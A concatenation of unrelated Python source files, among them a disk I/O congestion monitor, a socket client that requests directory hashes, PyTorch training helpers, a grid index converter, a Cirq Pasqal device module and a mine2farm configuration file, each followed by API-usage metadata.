'(data[:, i], axis=0)\n', (4659, 4679), True, 'import numpy as np\n'), ((4700, 4726), 'numpy.var', 'np.var', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4706, 4726), True, 'import numpy as np\n'), ((4747, 4773), 'numpy.max', 'np.max', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4753, 4773), True, 'import numpy as np\n'), ((4794, 4820), 'numpy.min', 'np.min', (['data[:, i]'], {'axis': '(0)'}), '(data[:, i], axis=0)\n', (4800, 4820), True, 'import numpy as np\n'), ((2497, 2514), 'numpy.unique', 'np.unique', (['self.Y'], {}), '(self.Y)\n', (2506, 2514), True, 'import numpy as np\n')] |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import logging
import os
from io_monitor.constants import DOMAIN
from io_monitor.utils.data_window import DataCollectionWindow
LOG = logging.getLogger(DOMAIN)
class DeviceDataCollector(object):
# Moving average windows
MA_WINDOW_SMA = 0
MA_WINDOW_MED = 1
MA_WINDOW_LAR = 2
# Device status
STATUS_NORMAL = "N"
STATUS_BUILDING = "B"
STATUS_CONGESTED = "L"
# Data tracked
DATA_IOPS = "iops"
DATA_AWAIT = "await"
def __init__(self, device_node, data_elements,
size_sma, size_med, size_lar):
self.node = device_node
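        # Prefer the device-mapper (dm) name for dm devices; otherwise fall back to the node name.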
if os.path.exists('/sys/block/' + self.node + '/dm/name'):
self.name = open('/sys/block/' + self.node + '/dm/name',
'r').read().rstrip()
else:
self.name = self.node
self.data_dict = {}
self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}
self.timestamp = None
self.congestion_status = self.STATUS_NORMAL
self.congestion_await_minimal_spike = -1
self.congestion_await_sustained = -1
for element in data_elements:
self.data_dict.update({element: [
DataCollectionWindow(size_sma, stuck_data_override=True),
DataCollectionWindow(size_med, stuck_data_override=True),
DataCollectionWindow(size_lar, stuck_data_override=True)]})
def update_congestion_status(self):
# Bail if threshold is not set
if self.congestion_await_sustained == -1:
return
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
# Set the congestion status based on await moving average
if self.congestion_status is self.STATUS_NORMAL:
if ma_sma > self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
if self.congestion_status is self.STATUS_BUILDING:
if ma_lar > self.congestion_await_sustained:
self.congestion_status = self.STATUS_CONGESTED
LOG.warn("Node %s (%s) is experiencing high await times."
% (self.node, self.name))
elif ma_sma < self.congestion_await_sustained:
self.congestion_status = self.STATUS_NORMAL
if self.congestion_status is self.STATUS_CONGESTED:
if ma_med < self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
def update_data(self, ts, element, value):
self.timestamp = ts
# LOG.debug("%s: e = %s, v= %f" % (self.node, element, value))
for w in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
self.data_dict[element][w].update(value, self.data_caps[element])
def get_latest(self, element):
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()
def get_average(self, element, window):
if window not in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
LOG.error("WindowError: invalid window requested = %s" % window)
return 0
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][window].get_average()
def is_data_stale(self, ts):
return not (ts == self.timestamp)
def get_congestion_status(self, debug=False):
if debug:
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" %
(self.node, ma_sma, ma_med, ma_lar,
self.congestion_await_sustained))
return self.congestion_status
def set_data_caps(self, element, cap):
if element in self.data_caps:
self.data_caps[element] = cap
def set_congestion_thresholds(self, await_minimal_spike,
await_sustained_congestion):
self.congestion_await_minimal_spike = await_minimal_spike
self.congestion_await_sustained = await_sustained_congestion
def get_element_windows_avg_list(self, element):
return [self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR)]
def get_element_windows_avg_string(self, element):
return "%s [ %9.2f, %9.2f, %9.2f ]" % (
element,
self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR))
| [
"logging.getLogger",
"os.path.exists",
"io_monitor.utils.data_window.DataCollectionWindow"
] | [((270, 295), 'logging.getLogger', 'logging.getLogger', (['DOMAIN'], {}), '(DOMAIN)\n', (287, 295), False, 'import logging\n'), ((739, 793), 'os.path.exists', 'os.path.exists', (["('/sys/block/' + self.node + '/dm/name')"], {}), "('/sys/block/' + self.node + '/dm/name')\n", (753, 793), False, 'import os\n'), ((1336, 1392), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_sma'], {'stuck_data_override': '(True)'}), '(size_sma, stuck_data_override=True)\n', (1356, 1392), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1410, 1466), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_med'], {'stuck_data_override': '(True)'}), '(size_med, stuck_data_override=True)\n', (1430, 1466), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n'), ((1484, 1540), 'io_monitor.utils.data_window.DataCollectionWindow', 'DataCollectionWindow', (['size_lar'], {'stuck_data_override': '(True)'}), '(size_lar, stuck_data_override=True)\n', (1504, 1540), False, 'from io_monitor.utils.data_window import DataCollectionWindow\n')] |
from net_common import *
import struct
import sys
def getDirHashOpts(withNames=False,
ignoreThumbsFiles=True,
ignoreUnixHiddenFiles=True,
ignoreEmptyDirs=True):
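    # Pack the four boolean options into a single option byte (bit flags).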
return bytearray([((1 if withNames else 0) +
(2 if ignoreThumbsFiles else 0) +
(4 if ignoreUnixHiddenFiles else 0) +
(8 if ignoreEmptyDirs else 0))])
if __name__ == "__main__":
sock = get_connected_local_socket()
path = encodeString('/dev/shm/exampleDir')
# path = encodeString('/dev/null')
sock.sendall(bytearray(b'\x0A')) # HASH request
# sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm
sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm
sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)
sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short
sock.sendall(path)
resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR
if resp != b'\x00':
print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0])
sys.exit(0)
# print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size
print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size
sock.close()
| [
"sys.exit"
] | [((1201, 1212), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1209, 1212), False, 'import sys\n')] |
'''Some helper functions for PyTorch, including:
    - progress_bar: progress bar that mimics xlua.progress.
    - set_lr: set the learning rate.
    - clip_gradient: clip gradients to a given range.
'''
import os
import sys
import time
import math
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function
# Get the number of rows and columns of the terminal
if sys.platform == 'win32':
term_width = 80
else:
print('###', os.popen('stty size', 'r').read())
_, term_width = os.popen('stty size', 'r').read().split()
term_width = int(term_width)
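# Total width (in characters) of the drawn progress bar.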
TOTAL_BAR_LENGTH = 30.
last_time = time.time()
begin_time = last_time
#[==>........ 19/225 ...........] | Loss: 1.961 | Acc: 22.000% (537/2432)
def progress_bar(current, total, msg=None):
global last_time, begin_time
if current == 0:
begin_time = time.time() # Reset for new bar.
cur_len = int(TOTAL_BAR_LENGTH*current/total)
rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1
sys.stdout.write(' [')
for i in range(cur_len):
sys.stdout.write('=')
sys.stdout.write('>')
for i in range(rest_len):
sys.stdout.write('.')
sys.stdout.write(']')
cur_time = time.time()
step_time = cur_time - last_time
last_time = cur_time
tot_time = cur_time - begin_time
L = []
if msg:
L.append(' | ' + msg)
msg = ''.join(L)
sys.stdout.write(msg)
for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):
sys.stdout.write(' ')
# Go back to the center of the bar.
for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):
sys.stdout.write('\b')
sys.stdout.write(' %d/%d ' % (current+1, total))
if current < total-1:
sys.stdout.write('\r')
else:
sys.stdout.write('\n')
sys.stdout.flush()
def set_lr(optimizer, lr):
for group in optimizer.param_groups:
group['lr'] = lr
def clip_gradient(optimizer, grad_clip):
for group in optimizer.param_groups:
#print(group['params'])
for param in group['params']:
param.grad.data.clamp_(-grad_clip, grad_clip)
| [
"sys.stdout.flush",
"os.popen",
"time.time",
"sys.stdout.write"
] | [((587, 598), 'time.time', 'time.time', ([], {}), '()\n', (596, 598), False, 'import time\n'), ((971, 993), 'sys.stdout.write', 'sys.stdout.write', (['""" ["""'], {}), "(' [')\n", (987, 993), False, 'import sys\n'), ((1060, 1081), 'sys.stdout.write', 'sys.stdout.write', (['""">"""'], {}), "('>')\n", (1076, 1081), False, 'import sys\n'), ((1149, 1170), 'sys.stdout.write', 'sys.stdout.write', (['"""]"""'], {}), "(']')\n", (1165, 1170), False, 'import sys\n'), ((1189, 1200), 'time.time', 'time.time', ([], {}), '()\n', (1198, 1200), False, 'import time\n'), ((1390, 1411), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (1406, 1411), False, 'import sys\n'), ((1648, 1698), 'sys.stdout.write', 'sys.stdout.write', (["(' %d/%d ' % (current + 1, total))"], {}), "(' %d/%d ' % (current + 1, total))\n", (1664, 1698), False, 'import sys\n'), ((1806, 1824), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1822, 1824), False, 'import sys\n'), ((825, 836), 'time.time', 'time.time', ([], {}), '()\n', (834, 836), False, 'import time\n'), ((1033, 1054), 'sys.stdout.write', 'sys.stdout.write', (['"""="""'], {}), "('=')\n", (1049, 1054), False, 'import sys\n'), ((1122, 1143), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (1138, 1143), False, 'import sys\n'), ((1487, 1508), 'sys.stdout.write', 'sys.stdout.write', (['""" """'], {}), "(' ')\n", (1503, 1508), False, 'import sys\n'), ((1620, 1644), 'sys.stdout.write', 'sys.stdout.write', (['"""\x08"""'], {}), "('\\x08')\n", (1636, 1644), False, 'import sys\n'), ((1735, 1757), 'sys.stdout.write', 'sys.stdout.write', (["'\\r'"], {}), "('\\r')\n", (1751, 1757), False, 'import sys\n'), ((1778, 1800), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (1794, 1800), False, 'import sys\n'), ((422, 448), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (430, 448), False, 'import os\n'), ((475, 501), 'os.popen', 'os.popen', (['"""stty size"""', '"""r"""'], {}), "('stty size', 'r')\n", (483, 501), False, 'import os\n')] |
from __future__ import absolute_import, division, print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
import numpy as np
import utils
logger = logging.getLogger("indexconverter")
class IndexConverter(object):
def __init__(self, ndim, ngrid):
self.ndim = ndim
self.ngrid = ngrid
self._modulus = [(ngrid - 1) ** (ndim - j - 1) for j in range(ndim)]
self._zerodim = np.zeros((self.ndim,))
self.nbins = int(np.rint((ngrid - 1) ** ndim))
def convert_to_vector(self, grid):
if grid.shape[0] != self.ngrid - 1:
raise Exception("Wrong dimension of grid. Expect length fo %s got %s" % (self.ngrid - 1, grid.shape[0]))
vector = np.empty((self.nbins,))
for bin_idx in range(self.nbins):
vector[bin_idx] = grid[tuple(self.convert_to_grid_idx(bin_idx))]
return vector
def convert_to_grid(self, vector):
grid_shape = tuple(np.zeros(self.ndim).astype(int) + (self.ngrid - 1))
if len(vector.shape) > 1:
grids = np.empty((len(vector),) + grid_shape)
for idx, v in enumerate(vector):
grids[idx] = self.convert_to_grid(v)
return grids
else:
grid = np.zeros(grid_shape)
for idx in range(len(vector)):
grid[tuple(self.convert_to_grid_idx(idx))] = vector[idx]
return grid
def convert_to_grid_idx(self, bin_idx):
if bin_idx >= self.nbins or bin_idx < 0:
print(self.nbins, self.ndim, self.nbins ** self.ndim)
raise Exception("Invalid index %s. You are probably outside the grid..." % bin_idx)
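        # Recover each grid coordinate by dividing the flat index by its place value and wrapping modulo (ngrid - 1).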
grid_idx = ((self._zerodim + bin_idx) / self._modulus) % (self.ngrid - 1)
return grid_idx.astype(int)
def convert_to_bin_idx(self, grid_idx):
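        # The dot product of the grid coordinates with the place values gives back the flat bin index.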
bin_idx = utils.rint(np.sum(grid_idx * self._modulus))
if bin_idx >= self.nbins or bin_idx < 0:
raise Exception(
"Invalid bin index %s. You are probably outside the grid. Size:%s" % (bin_idx, self.nbins))
return bin_idx
| [
"logging.basicConfig",
"logging.getLogger",
"numpy.sum",
"numpy.zeros",
"numpy.empty",
"numpy.rint"
] | [((93, 249), 'logging.basicConfig', 'logging.basicConfig', ([], {'stream': 'sys.stdout', 'level': 'logging.DEBUG', 'format': '"""%(asctime)s %(name)s-%(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(stream=sys.stdout, level=logging.DEBUG, format=\n '%(asctime)s %(name)s-%(levelname)s: %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (112, 249), False, 'import logging\n'), ((298, 333), 'logging.getLogger', 'logging.getLogger', (['"""indexconverter"""'], {}), "('indexconverter')\n", (315, 333), False, 'import logging\n'), ((556, 578), 'numpy.zeros', 'np.zeros', (['(self.ndim,)'], {}), '((self.ndim,))\n', (564, 578), True, 'import numpy as np\n'), ((852, 875), 'numpy.empty', 'np.empty', (['(self.nbins,)'], {}), '((self.nbins,))\n', (860, 875), True, 'import numpy as np\n'), ((604, 632), 'numpy.rint', 'np.rint', (['((ngrid - 1) ** ndim)'], {}), '((ngrid - 1) ** ndim)\n', (611, 632), True, 'import numpy as np\n'), ((1384, 1404), 'numpy.zeros', 'np.zeros', (['grid_shape'], {}), '(grid_shape)\n', (1392, 1404), True, 'import numpy as np\n'), ((1993, 2025), 'numpy.sum', 'np.sum', (['(grid_idx * self._modulus)'], {}), '(grid_idx * self._modulus)\n', (1999, 2025), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.zeros', 'np.zeros', (['self.ndim'], {}), '(self.ndim)\n', (1092, 1103), True, 'import numpy as np\n')] |
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import FrozenSet, Callable, List, Sequence, Any, Union, Dict
import numpy as np
import networkx as nx
import cirq
from cirq import _compat, GridQubit, LineQubit
from cirq.ops import NamedQubit
from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset
@cirq.value.value_equality
class PasqalDevice(cirq.devices.Device):
"""A generic Pasqal device.
The most general of Pasqal devices, enforcing only restrictions expected to
be shared by all future devices. Serves as the parent class of all Pasqal
devices, but can also be used on its own for hosting a nearly unconstrained
device. When used as a circuit's device, the qubits have to be of the type
cirq.NamedQubit and assumed to be all connected, the idea behind it being
that after submission, all optimization and transpilation necessary for its
execution on the specified device are handled internally by Pasqal.
"""
def __init__(self, qubits: Sequence[cirq.Qid]) -> None:
"""Initializes a device with some qubits.
Args:
qubits (NamedQubit): Qubits on the device, exclusively unrelated to
a physical position.
Raises:
TypeError: If the wrong qubit type is provided.
ValueError: If the number of qubits is greater than the devices maximum.
"""
if len(qubits) > 0:
q_type = type(qubits[0])
for q in qubits:
if not isinstance(q, self.supported_qubit_type):
raise TypeError(
'Unsupported qubit type: {!r}. This device '
'supports qubit types: {}'.format(q, self.supported_qubit_type)
)
if not type(q) is q_type:
raise TypeError("All qubits must be of same type.")
if len(qubits) > self.maximum_qubit_number:
raise ValueError(
'Too many qubits. {} accepts at most {} '
'qubits.'.format(type(self), self.maximum_qubit_number)
)
self.gateset = PasqalGateset()
self.qubits = qubits
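        # The connectivity graph is fully connected: an edge between every pair of distinct qubits.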
self._metadata = cirq.DeviceMetadata(
qubits, nx.from_edgelist([(a, b) for a in qubits for b in qubits if a != b])
)
# pylint: enable=missing-raises-doc
@property
def supported_qubit_type(self):
return (NamedQubit,)
@property
def maximum_qubit_number(self):
return 100
@property
def metadata(self):
return self._metadata
@_compat.deprecated(fix='Use metadata.qubit_set() if applicable.', deadline='v0.15')
def qubit_set(self) -> FrozenSet[cirq.Qid]:
return frozenset(self.qubits)
def qubit_list(self):
return [qubit for qubit in self.qubits]
def is_pasqal_device_op(self, op: cirq.Operation) -> bool:
if not isinstance(op, cirq.Operation):
raise ValueError('Got unknown operation:', op)
return op in self.gateset
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: The operation to validate.
Raises:
ValueError: If the operation is not valid.
NotImplementedError: If the operation is a measurement with an invert
mask.
"""
if not isinstance(operation, cirq.GateOperation):
raise ValueError("Unsupported operation")
if not self.is_pasqal_device_op(operation):
raise ValueError(f'{operation.gate!r} is not a supported gate')
for qub in operation.qubits:
if not isinstance(qub, self.supported_qubit_type):
raise ValueError(
'{} is not a valid qubit for gate {!r}. This '
'device accepts gates on qubits of type: '
'{}'.format(qub, operation.gate, self.supported_qubit_type)
)
if qub not in self.metadata.qubit_set:
raise ValueError(f'{qub} is not part of the device.')
if isinstance(operation.gate, cirq.MeasurementGate):
if operation.gate.invert_mask != ():
raise NotImplementedError(
"Measurements on Pasqal devices don't support invert_mask."
)
def validate_circuit(self, circuit: 'cirq.AbstractCircuit') -> None:
"""Raises an error if the given circuit is invalid on this device.
A circuit is invalid if any of its moments are invalid or if there
is a non-empty moment after a moment with a measurement.
Args:
circuit: The circuit to validate
Raises:
ValueError: If the given circuit can't be run on this device
"""
super().validate_circuit(circuit)
# Measurements must be in the last non-empty moment
has_measurement_occurred = False
for moment in circuit:
if has_measurement_occurred:
if len(moment.operations) > 0:
raise ValueError("Non-empty moment after measurement")
for operation in moment.operations:
if isinstance(operation.gate, cirq.MeasurementGate):
has_measurement_occurred = True
def __repr__(self):
return f'pasqal.PasqalDevice(qubits={sorted(self.qubits)!r})'
def _value_equality_values_(self):
return self.qubits
def _json_dict_(self):
return cirq.protocols.obj_to_dict_helper(self, ['qubits'])
class PasqalVirtualDevice(PasqalDevice):
"""A Pasqal virtual device with qubits in 3d.
A virtual representation of a Pasqal device, enforcing the constraints
typically found in a physical device. The qubits can be positioned in 3d
space, although 2d layouts will be supported sooner and are thus
recommended. Only accepts qubits with physical placement.
"""
def __init__(
self, control_radius: float, qubits: Sequence[Union[ThreeDQubit, GridQubit, LineQubit]]
) -> None:
"""Initializes a device with some qubits.
Args:
control_radius: the maximum distance between qubits for a controlled
gate. Distance is measured in units of the coordinates passed
into the qubit constructor.
qubits: Qubits on the device, identified by their x, y, z position.
Must be of type ThreeDQubit, TwoDQubit, LineQubit or GridQubit.
Raises:
ValueError: if the wrong qubit type is provided or if invalid
parameter is provided for control_radius."""
super().__init__(qubits)
if not control_radius >= 0:
raise ValueError('Control_radius needs to be a non-negative float.')
if len(self.qubits) > 1:
if control_radius > 3.0 * self.minimal_distance():
raise ValueError(
'Control_radius cannot be larger than 3 times'
' the minimal distance between qubits.'
)
self.control_radius = control_radius
self.gateset = PasqalGateset(include_additional_controlled_ops=False)
self.controlled_gateset = cirq.Gateset(cirq.AnyIntegerPowerGateFamily(cirq.CZPowGate))
@property
def supported_qubit_type(self):
return (ThreeDQubit, TwoDQubit, GridQubit, LineQubit)
def validate_operation(self, operation: cirq.Operation):
"""Raises an error if the given operation is invalid on this device.
Args:
operation: the operation to validate
Raises:
ValueError: If the operation is not valid
"""
super().validate_operation(operation)
# Verify that a controlled gate operation is valid
if operation in self.controlled_gateset:
for p in operation.qubits:
for q in operation.qubits:
if self.distance(p, q) > self.control_radius:
raise ValueError(f"Qubits {p!r}, {q!r} are too far away")
def validate_moment(self, moment: cirq.Moment):
"""Raises an error if the given moment is invalid on this device.
Args:
moment: The moment to validate.
Raises:
ValueError: If the given moment is invalid.
"""
super().validate_moment(moment)
if len(moment) > 1:
for operation in moment:
if not isinstance(operation.gate, cirq.MeasurementGate):
raise ValueError("Cannot do simultaneous gates. Use cirq.InsertStrategy.NEW.")
    def minimal_distance(self) -> float:
        """Returns the minimal distance between two qubits of the device.
        Raises:
            ValueError: If the device has fewer than two qubits.
        Returns:
            The minimal distance between qubits, in spatial coordinate units.
"""
if len(self.qubits) <= 1:
            raise ValueError("At least two qubits are required to compute a minimal distance.")
return min([self.distance(q1, q2) for q1 in self.qubits for q2 in self.qubits if q1 != q2])
def distance(self, p: Any, q: Any) -> float:
"""Returns the distance between two qubits.
Args:
p: qubit involved in the distance computation
q: qubit involved in the distance computation
Raises:
ValueError: If p or q not part of the device
Returns:
The distance between qubits p and q.
"""
all_qubits = self.qubit_list()
if p not in all_qubits or q not in all_qubits:
raise ValueError("Qubit not part of the device.")
if isinstance(p, GridQubit):
return np.sqrt((p.row - q.row) ** 2 + (p.col - q.col) ** 2)
if isinstance(p, LineQubit):
return abs(p.x - q.x)
return np.sqrt((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)
def __repr__(self):
return ('pasqal.PasqalVirtualDevice(control_radius={!r}, qubits={!r})').format(
self.control_radius, sorted(self.qubits)
)
def _value_equality_values_(self) -> Any:
return (self.control_radius, self.qubits)
def _json_dict_(self) -> Dict[str, Any]:
return cirq.protocols.obj_to_dict_helper(self, ['control_radius', 'qubits'])
@_compat.deprecated_class(
deadline='v0.16', fix='Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).'
)
class PasqalConverter(cirq.neutral_atoms.ConvertToNeutralAtomGates):
"""A gate converter for compatibility with Pasqal processors.
Modified version of ConvertToNeutralAtomGates, where a new 'convert' method
'pasqal_convert' takes the 'keep' function as an input.
"""
def pasqal_convert(
self, op: cirq.Operation, keep: Callable[[cirq.Operation], bool]
) -> List[cirq.Operation]:
def on_stuck_raise(bad):
return TypeError(
"Don't know how to work with {!r}. "
"It isn't a native PasqalDevice operation, "
"a 1 or 2 qubit gate with a known unitary, "
"or composite.".format(bad)
)
return cirq.protocols.decompose(
op,
keep=keep,
intercepting_decomposer=self._convert_one,
on_stuck_raise=None if self.ignore_failures else on_stuck_raise,
)
| [
"numpy.sqrt",
"cirq.protocols.decompose",
"cirq.AnyIntegerPowerGateFamily",
"cirq._compat.deprecated",
"networkx.from_edgelist",
"cirq._compat.deprecated_class",
"cirq.protocols.obj_to_dict_helper",
"cirq_pasqal.PasqalGateset"
] | [((10990, 11116), 'cirq._compat.deprecated_class', '_compat.deprecated_class', ([], {'deadline': '"""v0.16"""', 'fix': '"""Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset())."""'}), "(deadline='v0.16', fix=\n 'Use cirq.optimize_for_target_gateset(circuit, gateset=PasqalGateset()).')\n", (11014, 11116), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((3091, 3179), 'cirq._compat.deprecated', '_compat.deprecated', ([], {'fix': '"""Use metadata.qubit_set() if applicable."""', 'deadline': '"""v0.15"""'}), "(fix='Use metadata.qubit_set() if applicable.', deadline=\n 'v0.15')\n", (3109, 3179), False, 'from cirq import _compat, GridQubit, LineQubit\n'), ((2636, 2651), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {}), '()\n', (2649, 2651), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((6074, 6125), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['qubits']"], {}), "(self, ['qubits'])\n", (6107, 6125), False, 'import cirq\n'), ((7717, 7771), 'cirq_pasqal.PasqalGateset', 'PasqalGateset', ([], {'include_additional_controlled_ops': '(False)'}), '(include_additional_controlled_ops=False)\n', (7730, 7771), False, 'from cirq_pasqal import ThreeDQubit, TwoDQubit, PasqalGateset\n'), ((10519, 10582), 'numpy.sqrt', 'np.sqrt', (['((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)'], {}), '((p.x - q.x) ** 2 + (p.y - q.y) ** 2 + (p.z - q.z) ** 2)\n', (10526, 10582), True, 'import numpy as np\n'), ((10917, 10986), 'cirq.protocols.obj_to_dict_helper', 'cirq.protocols.obj_to_dict_helper', (['self', "['control_radius', 'qubits']"], {}), "(self, ['control_radius', 'qubits'])\n", (10950, 10986), False, 'import cirq\n'), ((11843, 11999), 'cirq.protocols.decompose', 'cirq.protocols.decompose', (['op'], {'keep': 'keep', 'intercepting_decomposer': 'self._convert_one', 'on_stuck_raise': '(None if self.ignore_failures else on_stuck_raise)'}), '(op, keep=keep, intercepting_decomposer=self.\n _convert_one, on_stuck_raise=None if self.ignore_failures else\n on_stuck_raise)\n', (11867, 11999), False, 'import cirq\n'), ((2747, 2815), 'networkx.from_edgelist', 'nx.from_edgelist', (['[(a, b) for a in qubits for b in qubits if a != b]'], {}), '([(a, b) for a in qubits for b in qubits if a != b])\n', (2763, 2815), True, 'import networkx as nx\n'), ((7819, 7865), 'cirq.AnyIntegerPowerGateFamily', 'cirq.AnyIntegerPowerGateFamily', (['cirq.CZPowGate'], {}), '(cirq.CZPowGate)\n', (7849, 7865), False, 'import cirq\n'), ((10378, 10430), 'numpy.sqrt', 'np.sqrt', (['((p.row - q.row) ** 2 + (p.col - q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n', (10385, 10430), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from enum import Enum, IntEnum, unique
import os
APP_NAME = "mine2farm"
NETWORK_NAME = "CenterAxis"
LOG_LEVEL_CONSOLE = "WARNING"
LOG_LEVEL_FILE = "INFO"
APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/")
LOG_FOLDER = APP_FOLDER + "app/log/"
LOG_FILE = "%(asctime)_" + APP_NAME + ".log"
OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/")
CANVAS_URL = "http://127.0.0.1/canvas.xlsm"
# DB
DB_NAME = None
DB_HOST = "172.29.161.208"
DB_PORT = 5006
DATA_SERVICE_ADD = "172.29.161.208"
DATA_SERVICE_PORT = 5001
# Results
DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None
DB_DETAILED_RESULT_COLLECTION_NAME = "detailed"
DB_GLOBAL_RESULT_COLLECTION_NAME = "global"
DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best"
DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best"
DB_SENSITIVITY_COLLECTION_NAME = "sensitivity"
RESULT_BATCHES_SIZE = 25
HEAD_DATA_BITS = 17
DB_NAME_BITS = 20
RANDOMIZE_RESULTS = False
# RabbitMQ
RABBITMQ_SERVER = "localhost"
RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE"
RABBITMQ_CYCLE = 3
RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL"
RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL"
RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE
RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin"
# Memcached
MEMCACHED_SERVER = 'localhost'
MEMCACHED_PORT = 11211
# Dashboard
DB_LOAD_FROM_SERVICE = True
# Monitoring
MONITORING_APP_NAME = "mine2farm_monitor"
MONITORING_SERVER = "172.29.161.208"
MONITORING_PORT = 5002
MONITORING_DB_NAME = "task_history"
MONITORING_COLLECTION_HISTORY_NAME = "task"
MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history"
MONITORING_STEP = 1
MONITORING_NB_PAGE = 10
# Mongodb-bi
MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin"
# Mongodb
MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin"
# params
LOGISTICS_LP = False
MODE_DEBUG = False
GRANUL_RELAX = False
class HTML_STATUS(IntEnum):
ERROR = -1
OK = 0
# Model
MONIKER_SEPARATOR = "/"
WACC = 0.1
T0 = 2020
TMAX = 2031
class PriceParams(Enum):
WACC = 0
TENOR = 1
VOLUME = 2
class PipelineType(Enum):
COMMON = 0
PRODUCER = 1
TRANSPORT = 2
BALANCE = 3
PRICE = 4
SALES = 5
@unique
class PipelineLayer(IntEnum):
UNDEFINED = -1
MINE = 0
BENEFICIATION = 1
SAP = 2
PAP = 3
GRANULATION = 4
LOGISTICS = 5
RAW_MATERIALS = 8
COMMON = 9
SALES_PLAN = 10
MINE_BENEFICIATION = 11
UNIT_CONVERSION_MATRIX = 12
